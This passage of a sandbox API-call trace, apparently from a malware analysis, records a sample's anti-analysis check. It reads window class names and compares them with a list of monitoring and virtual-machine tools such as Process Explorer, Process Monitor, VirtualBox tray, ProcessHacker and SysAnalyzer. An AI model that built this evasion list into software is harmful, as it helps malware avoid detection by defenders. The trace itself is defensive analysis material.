iMaxLength=1024 | 
out: lpString1="") returned="" [0158.473] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.473] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.473] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.474] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.474] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.474] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.474] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.474] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.474] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.474] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.474] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.474] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.474] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.474] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.474] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.475] lstrcpynA (in: lpString1=0x341200, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.475] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.475] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.475] lstrcpynA (in: lpString1=0x340df8, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.475] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.475] strstr (_Str="Task Switching", _SubStr="sysinternals") returned 0x0 [0158.475] lstrcpynA (in: 
lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.475] lstrcpynA (in: lpString1=0x341200, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.475] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.475] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.475] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.475] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.475] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.475] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.475] lstrlenA (lpString="0") returned 1 [0158.475] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.475] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.475] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.476] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.476] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.476] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.476] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.476] lstrlenA (lpString="0") returned 1 [0158.476] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.476] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.476] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.476] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.477] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.477] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.477] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.477] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.477] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.477] lstrlenA (lpString="3399936") returned 7 [0158.478] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.478] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.478] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.478] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.478] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.478] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.478] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.478] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.478] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.478] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.478] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65692") returned 5 [0158.478] lstrcpyA (in: lpString1=0x430400, lpString2="65692" | out: lpString1="65692") returned="65692" [0158.478] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.478] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.479] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.479] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: 
lpString1="callback1") returned="callback1" [0158.479] lstrlenA (lpString="callback1") returned 9 [0158.479] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.479] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.479] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.479] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.479] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.479] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.479] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.479] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.479] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.479] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.479] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.479] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.479] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.479] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.480] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.480] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.480] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.480] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.480] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.480] lstrcpynA (in: lpString1=0x341200, lpString2="65692", iMaxLength=1024 | out: lpString1="65692") returned="65692" [0158.480] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.480] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" 
[0158.480] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.480] GetWindowTextA (in: hWnd=0x1009c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.480] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.480] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.480] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.481] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65692") returned 5 [0158.481] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.481] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.481] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.481] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.481] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.481] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.481] lstrcpynA (in: lpString1=0x40a418, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.481] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.481] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.481] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.481] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.481] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.481] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.482] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.482] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.482] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.482] lstrcpynA (in: lpString1=0x3401e0, lpString2="65692", iMaxLength=1024 | out: lpString1="65692") returned="65692" [0158.482] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.482] 
lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.482] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.482] GetClassNameA (in: hWnd=0x1009c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.482] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.482] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.482] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.482] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65692") returned 5 [0158.482] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.482] lstrlenA (lpString="0") returned 1 [0158.482] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.482] lstrlenA (lpString="tooltips_class32") returned 16 [0158.482] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.482] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.482] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.482] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.482] lstrlenA (lpString="tooltips_class32") returned 16 [0158.482] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, 
lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.483] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrlenA (lpString="tooltips_class32") returned 16 [0158.483] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.483] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrlenA (lpString="tooltips_class32") returned 16 [0158.483] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.483] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrlenA (lpString="tooltips_class32") returned 16 [0158.483] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", 
iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.483] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrlenA (lpString="tooltips_class32") returned 16 [0158.483] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.483] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrlenA (lpString="tooltips_class32") returned 16 [0158.483] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.483] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrlenA (lpString="tooltips_class32") returned 16 [0158.483] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.483] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") 
returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.483] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.484] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.484] lstrlenA (lpString="tooltips_class32") returned 16 [0158.484] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.484] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.484] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.484] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.484] lstrlenA (lpString="tooltips_class32") returned 16 [0158.484] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.484] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.484] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.484] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.484] lstrlenA (lpString="tooltips_class32") returned 16 [0158.484] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.484] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.484] lstrcmpiA 
(lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.484] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.484] lstrlenA (lpString="") returned 0 [0158.484] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.484] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.484] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.484] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.484] lstrlenA (lpString="") returned 0 [0158.484] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.484] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.484] 